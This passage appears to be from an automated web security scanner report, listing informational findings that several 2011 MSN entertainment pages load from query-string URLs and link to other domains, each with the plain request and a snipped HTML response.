Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:42 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=74e3f85a127042c59575b1cc56383c8e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=BC0C21C2C4134FB5BB7DCFD44CA28FF4; domain=.entertainment.msn.com; expires=Thu, 18-Aug-2011 16:57:42 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://search.bing.com/results.aspx?FORM=entertainment">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406662&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fvideodrone-blogpost.aspx%3Fpost%3D55ccee98-7e3b-4bfa-bd91-b7e77c8bc174&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://search.bing.com/results.aspx">Search the web</a>
...[SNIP]...
<br /><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126065439_dogtooth_200.jpg" alt="" class="imagefloatright userImage lead" />More interesting (and far less commercial) is "<b>
...[SNIP]...
</blockquote><a href="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/" title="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/"><br />
...[SNIP]...
ttp://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx?post=55ccee98-7e3b-4bfa-bd91-b7e77c8bc174&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
social.entertainment.msn.com/movies/blogs/videodrone-blogpost.aspx?post=55ccee98-7e3b-4bfa-bd91-b7e77c8bc174&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.seanax.com">Sean Axmaker</a> is MSN's DVD columnist and the editor of <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.parallax-view.org">Parallax View</a>
...[SNIP]...
<li class="first"><a href="http://www.criterionforum.org/forum/index.php">Criterion Forum</a>
...[SNIP]...
<li><a href="http://www.criterion.com/current/posts">Criterion Current</a>
...[SNIP]...
<li><a href="http://www.davekehr.com/">Dave Kehr</a></li><li><a href="http://www.thedigitalbits.com/">The Digital Bits</a>
...[SNIP]...
<li><a href="http://www.dvdbeaver.com/">DVD Beaver</a></li><li><a href="http://www.dvdreview.com/">DVD Review </a>
...[SNIP]...
<li><a href="http://www.dvdtalk.com/dvdsavant/index.html">DVD Savant</a></li><li><a href="http://www.dvdtalk.com/">DVD Talk</a></li><li><a href="http://www.highdefdigest.com/">High-Def Digest </a>
...[SNIP]...
<li><a href="http://www.hometheaterforum.com/">Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.nitrateville.com/">Nitrateville</a>
...[SNIP]...
<li><a href="http://www.silentera.com/index.html">Silent Era</a></li><li><a href="http://www.hometheaterforum.com/forum/list/117">Talk With the Insiders at Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.tvshowsondvd.com/">TV Shows on DVD</a>
...[SNIP]...
<li class="last"><a href="http://www.videowatchdog.blogspot.com/">Video Watchblog</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.301. http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.entertainment.redacted
Path:   /movies/blogs/videodrone-blogpost.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /movies/blogs/videodrone-blogpost.aspx?post=55ccee98-7e3b-4bfa-bd91-b7e77c8bc174 HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=26628041ed41451f9975fddaa6b6aaba; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=9AF5EF0758BA4E538D325E0F17C8292E; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://search.bing.com/results.aspx?FORM=entertainment">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345052&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fvideodrone-blogpost.aspx%3Fpost%3D55ccee98-7e3b-4bfa-bd91-b7e77c8bc174&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://search.bing.com/results.aspx">Search the web</a>
...[SNIP]...
<br /><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126065439_dogtooth_200.jpg" alt="" class="imagefloatright userImage lead" />More interesting (and far less commercial) is "<b>
...[SNIP]...
</blockquote><a href="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/" title="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/"><br />
...[SNIP]...
ttp://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx?post=55ccee98-7e3b-4bfa-bd91-b7e77c8bc174&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
social.entertainment.msn.com/movies/blogs/videodrone-blogpost.aspx?post=55ccee98-7e3b-4bfa-bd91-b7e77c8bc174&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.seanax.com">Sean Axmaker</a> is MSN's DVD columnist and the editor of <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.parallax-view.org">Parallax View</a>
...[SNIP]...
<li class="first"><a href="http://www.criterionforum.org/forum/index.php">Criterion Forum</a>
...[SNIP]...
<li><a href="http://www.criterion.com/current/posts">Criterion Current</a>
...[SNIP]...
<li><a href="http://www.davekehr.com/">Dave Kehr</a></li><li><a href="http://www.thedigitalbits.com/">The Digital Bits</a>
...[SNIP]...
<li><a href="http://www.dvdbeaver.com/">DVD Beaver</a></li><li><a href="http://www.dvdreview.com/">DVD Review </a>
...[SNIP]...
<li><a href="http://www.dvdtalk.com/dvdsavant/index.html">DVD Savant</a></li><li><a href="http://www.dvdtalk.com/">DVD Talk</a></li><li><a href="http://www.highdefdigest.com/">High-Def Digest </a>
...[SNIP]...
<li><a href="http://www.hometheaterforum.com/">Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.nitrateville.com/">Nitrateville</a>
...[SNIP]...
<li><a href="http://www.silentera.com/index.html">Silent Era</a></li><li><a href="http://www.hometheaterforum.com/forum/list/117">Talk With the Insiders at Home Theater Forum</a>
...[SNIP]...
<li><a href="http://www.tvshowsondvd.com/">TV Shows on DVD</a>
...[SNIP]...
<li class="last"><a href="http://www.videowatchdog.blogspot.com/">Video Watchblog</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.302. http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx?cp-documentid=27455681 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fda123bc754b442aadc60ee5ad19dddf; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2511CF056BC5418BB364016D5274BBF7; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:21 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406701&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FCharlie-Sheen-checks-into-rehab-show-on-hiatus.aspx%3Fcp-documentid%3D27455681&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=charlie+sheen+rehab&amp;form=msnpop"><strong>
...[SNIP]...
<div>Charlie Sheen voluntarily <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=charlie+sheen+rehab&amp;form=msnpop">entered a rehab center</a> for treatment, one day after he was rushed to a Los Angeles hospital (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=sheen+hernia&amp;form=msnpop">for what?</a>)... While Sheen goes through recovery, his hit sitcom (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/watch/video/two-and-a-half-men-straight-from-the-heart/17ufqu9iu?q=two+and+a+half+men&amp;FROM=LKVR5&amp;GT1=LKVR5&amp;FORM=msnpop">watch clip</a>) is being put <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=two+and+a+half+men+hiatus&amp;form=msnpop">on hiatus</a>
...[SNIP]...
<div>Sheen recently ran up <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=charlie+sheen+spends+prostitutes+cocaine&amp;form=msnpop">an expensive tab</a>
...[SNIP]...
<div>He has two daughters with a <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=denise+richards&amp;form=msnpop">Hollywood actress</a>
...[SNIP]...
<div>A <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jason+davis+arrested&amp;form=msnpop">'Celebrity Rehab' graduate</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.303. http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx?cp-documentid=27455681 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:22 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=bc9ead832d6044909d6af976359901c1; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=EA5515447F1E4893A032A4545D8AD125; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:22 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345082&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FCharlie-Sheen-checks-into-rehab-show-on-hiatus.aspx%3Fcp-documentid%3D27455681&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=charlie+sheen+rehab&amp;form=msnpop"><strong>
...[SNIP]...
<div>Charlie Sheen voluntarily <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=charlie+sheen+rehab&amp;form=msnpop">entered a rehab center</a> for treatment, one day after he was rushed to a Los Angeles hospital (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=sheen+hernia&amp;form=msnpop">for what?</a>)... While Sheen goes through recovery, his hit sitcom (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/watch/video/two-and-a-half-men-straight-from-the-heart/17ufqu9iu?q=two+and+a+half+men&amp;FROM=LKVR5&amp;GT1=LKVR5&amp;FORM=msnpop">watch clip</a>) is being put <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=two+and+a+half+men+hiatus&amp;form=msnpop">on hiatus</a>
...[SNIP]...
<div>Sheen recently ran up <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=charlie+sheen+spends+prostitutes+cocaine&amp;form=msnpop">an expensive tab</a>
...[SNIP]...
<div>He has two daughters with a <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=denise+richards&amp;form=msnpop">Hollywood actress</a>
...[SNIP]...
<div>A <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jason+davis+arrested&amp;form=msnpop">'Celebrity Rehab' graduate</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.304. http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx?cp-documentid=27455006 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:20 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=9a8c91ff4ad14e8a811cebb0c0f474e2; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=F372C16564F749C8AB98043568B4614B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:20 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
